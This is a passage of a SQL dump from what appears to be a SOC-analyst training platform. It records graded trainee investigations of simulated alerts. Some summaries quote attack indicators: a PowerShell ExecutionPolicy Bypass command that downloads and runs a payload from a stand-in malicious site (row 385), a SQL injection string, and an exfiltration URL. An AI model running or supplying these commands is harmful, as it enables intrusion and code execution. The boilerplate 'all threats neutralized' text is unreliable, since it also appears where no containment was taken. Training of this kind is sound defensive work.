(370, 229, 268, 'graded', 70, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (0/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/10/2026, 6:20:15 PM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-11T01:20:21.813Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (0/4)\",\"missed_items\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"strengths\":\"Needs improvement\"}', NULL, '2026-03-02 15:05:11', '2026-03-11 01:20:21', 0, NULL),
(371, 232, 268, 'graded', 78, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/7/2026, 1:50:26 PM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-07T08:20:36.127Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/4)\",\"missed_items\":[\"block_ip\",\"block_hash\",\"collect_forensics\"],\"strengths\":\"Needs improvement\"}', NULL, '2026-03-03 03:14:28', '2026-03-07 08:20:36', 0, NULL),
(372, 178, 1361, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"close_alert\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/3/2026, 3:42:42 PM\\nALERT: Initial Access via Trojanized Trading App [OP: Operation TraderTraitor]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [FILENAME] TradePlusPro_Setup.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (7)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-03T08:42:53.354Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-03 11:47:33', '2026-03-03 08:41:33', '2026-03-03 08:42:53', 0, NULL),
(373, 178, 1362, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.25\",\"ip-185.100.87.202\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"close_alert\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/3/2026, 3:44:49 PM\\nALERT: Execution of Remote Access Trojan (RAT) [OP: Operation TraderTraitor]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.25\\n- [IP] 185.100.87.202\\n- [HASH] b9f7b3e3f5ab4a3a8f1a2f4e2a7b9d8c\\n- [USERNAME] jdoe\\n- [FILENAME] rat_executable.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (7)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-03T08:44:54.733Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-03 08:42:53', '2026-03-03 08:44:54', 0, NULL),
(374, 178, 1363, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.105\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"close_alert\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/3/2026, 3:46:36 PM\\nALERT: Persistence through Credential Theft [OP: Operation TraderTraitor]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.105\\n- [USERNAME] jdoe\\n- [HASH] f7a2edb1b4567e2d5f8e8497c9a3f378\\n- [FILENAME] wannacry.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (7)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-03T08:46:47.762Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-03 08:44:54', '2026-03-03 08:46:47', 0, NULL),
(375, 233, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-03 09:48:25', '2026-03-03 09:48:25', 0, NULL);
INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(376, 233, 1386, 'graded', 100, 'Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.1.1.1\",\"ip-10.1.1.10\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/3/2026, 1:13:19 PM\\nALERT: False Positive: Routine Internal Network Scan\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 10.1.1.1\\n- [IP] 10.1.1.10\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (1)\\n------------------------------\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-03T12:13:40.895Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-03 15:15:41', '2026-03-03 12:10:41', '2026-03-03 12:13:40', 0, NULL),
(377, 233, 847, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.45\",\"ip-192.168.1.150\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/3/2026, 1:15:19 PM\\nALERT: SQL Injection Attempt Blocked\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 198.51.100.45\\n- [IP] 192.168.1.150\\n- [PAYLOAD] \' OR \'1\'=\'1\' --\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-03T12:15:21.924Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (1/2)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Solid analysis\"}', '2026-03-03 15:20:57', '2026-03-03 12:13:57', '2026-03-03 12:15:21', 0, NULL),
(378, 56, 1361, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-03 15:51:36', '2026-03-03 15:51:36', 0, NULL),
(379, 56, 1392, 'investigating', NULL, NULL, NULL, NULL, '2026-03-03 19:02:37', '2026-03-03 15:52:37', '2026-03-03 15:52:37', 0, NULL),
(380, 234, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-03 19:44:00', '2026-03-03 19:44:00', 0, NULL),
(381, 234, 1433, 'investigating', NULL, NULL, NULL, NULL, '2026-03-03 22:51:21', '2026-03-03 19:44:21', '2026-03-03 19:44:21', 0, NULL),
(382, 235, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-03 20:13:02', '2026-03-03 20:13:02', 0, NULL),
(383, 235, 1378, 'investigating', NULL, NULL, NULL, NULL, '2026-03-03 23:20:28', '2026-03-03 20:14:28', '2026-03-03 20:14:28', 0, NULL),
(384, 237, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-03 23:25:53', '2026-03-03 23:25:53', 0, NULL),
(385, 189, 305, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-203.0.113.45\",\"hash-e3b0c442\",\"cmd-1\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/4/2026, 2:49:48 AM\\nALERT: Suspicious PowerShell Execution [OP: Operation Desert Mirage]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 203.0.113.45\\n- [HASH] e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\n- [COMMAND] powershell -NoProfile -ExecutionPolicy Bypass -Command \\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicioussite.com/payload\')\\\"\\n- [FILENAME] malicious_script.ps1\\n- [USERNAME] john.doe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-03-04T01:50:03.419Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-04 01:46:47', '2026-03-04 01:50:03', 0, NULL),
(386, 189, 306, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.10\",\"hash-5d41402a\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/4/2026, 2:51:13 AM\\nALERT: Persistence Mechanism Established [OP: Operation Desert Mirage]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.10\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [USERNAME] john.doe\\n- [FILENAME] taskhost.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-03-04T01:51:27.139Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-04 01:50:03', '2026-03-04 01:51:27', 0, NULL),
(387, 189, 307, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-192.168.1.20\",\"ip-203.0.113.45\",\"hash-b1946ac9\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/4/2026, 2:52:56 AM\\nALERT: Unauthorized Lateral Movement Detected [OP: Operation Desert Mirage]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 192.168.1.20\\n- [IP] 203.0.113.45\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [USERNAME] j.doe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadoou MANE\",\"submitted_at\":\"2026-03-04T01:53:15.347Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-04 01:51:27', '2026-03-04 01:53:15', 0, NULL),
(388, 189, 308, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.1.2.15\",\"ip-203.0.113.45\",\"hash-f2ca1bb6\",\"domain-https://mali\",\"artifact_5\",\"artifact_6\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/4/2026, 2:54:38 AM\\nALERT: Data Exfiltration Attempt [OP: Operation Desert Mirage]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 10.1.2.15\\n- [IP] 203.0.113.45\\n- [HASH] f2ca1bb6c7e907d06dafe4687e579fce\\n- [DOMAIN] https://malicious-c2.com/exfil\\n- [FILENAME] geo_data_export.zip\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-03-04T01:54:55.259Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-04 01:53:15', '2026-03-04 01:54:55', 0, NULL),
(389, 237, 693, 'investigating', NULL, NULL, NULL, NULL, '2026-03-04 19:07:30', '2026-03-04 15:58:30', '2026-03-04 15:58:30', 0, NULL),
(390, 237, 1435, 'investigating', NULL, NULL, NULL, NULL, '2026-03-04 19:13:10', '2026-03-04 16:07:10', '2026-03-04 16:07:10', 0, NULL),
(391, 241, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-04 16:22:18', '2026-03-04 16:22:18', 0, NULL),
(392, 244, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-04 20:19:53', '2026-03-04 20:19:53', 0, NULL),
(393, 245, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-05 04:55:30', '2026-03-05 04:55:30', 0, NULL),
(394, 225, 606, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.25\",\"artifact_2\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/5/2026, 4:18:59 PM\\nALERT: Failed Login Attempts from Foreign IP\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (2)\\n----------------\\n- [IP] 198.51.100.25\\n- [USERNAME] admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-05T05:19:14.654Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-05 08:27:03', '2026-03-05 05:17:03', '2026-03-05 05:19:14', 0, NULL),
(395, 225, 1446, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.10\",\"hash-d41d8cd9\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/5/2026, 4:21:49 PM\\nALERT: Suspicious App Download Detected [OP: Operation AppleJeus]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.10\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] CryptoTraderProSetup.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-05T05:21:53.666Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-05 08:30:20', '2026-03-05 05:20:20', '2026-03-05 05:21:53', 0, NULL),
(396, 225, 1447, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-143.110.227.12\",\"hash-e99a18c4\",\"cmd-1\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/5/2026, 4:23:20 PM\\nALERT: Execution of Unknown Scripts [OP: Operation AppleJeus]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 143.110.227.12\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [COMMAND] powershell.exe -ExecutionPolicy Bypass -File hidden_script.ps1\\n- [FILENAME] hidden_script.ps1\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-05T05:23:22.318Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-05 05:21:53', '2026-03-05 05:23:22', 0, NULL),
(397, 225, 1448, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"hash-5d41402a\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/5/2026, 4:24:40 PM\\nALERT: Establishment of Persistence Mechanism [OP: Operation AppleJeus]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-05T05:24:43.195Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-05 05:23:22', '2026-03-05 05:24:43', 0, NULL),
(398, 225, 1449, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.15\",\"hash-6f5902ac\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/5/2026, 4:26:13 PM\\nALERT: Unauthorized Lateral Movement Attempt [OP: Operation AppleJeus]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.15\\n- [HASH] 6f5902ac237024bdd0c176cb93063dc4\\n- [USERNAME] jdoe\\n- [FILENAME] mimikatz.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-05T05:26:15.724Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-05 05:24:43', '2026-03-05 05:26:15', 0, NULL),
(399, 225, 1450, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.0.101\",\"ip-203.0.113.45\",\"hash-b1946ac9\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"reset_credentials\",\"escalate\",\"collect_forensics\",\"block_hash\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/5/2026, 4:27:13 PM\\nALERT: Sensitive Data Exfiltration Detected [OP: Operation AppleJeus]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 10.0.0.101\\n- [IP] 203.0.113.45\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [FILENAME] wallet_keys.txt\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-05T05:27:14.809Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-05 05:26:15', '2026-03-05 05:27:14', 0, NULL),
(400, 246, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-05 07:51:20', '2026-03-05 07:51:20', 0, NULL),
(401, 246, 1383, 'investigating', NULL, NULL, NULL, NULL, '2026-03-05 11:03:39', '2026-03-05 07:54:39', '2026-03-05 07:54:39', 0, NULL),
(402, 247, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-05 11:37:14', '2026-03-05 11:37:14', 0, NULL),
(403, 247, 1438, 'investigating', NULL, NULL, NULL, NULL, '2026-03-05 14:47:39', '2026-03-05 11:37:39', '2026-03-05 11:37:39', 0, NULL),
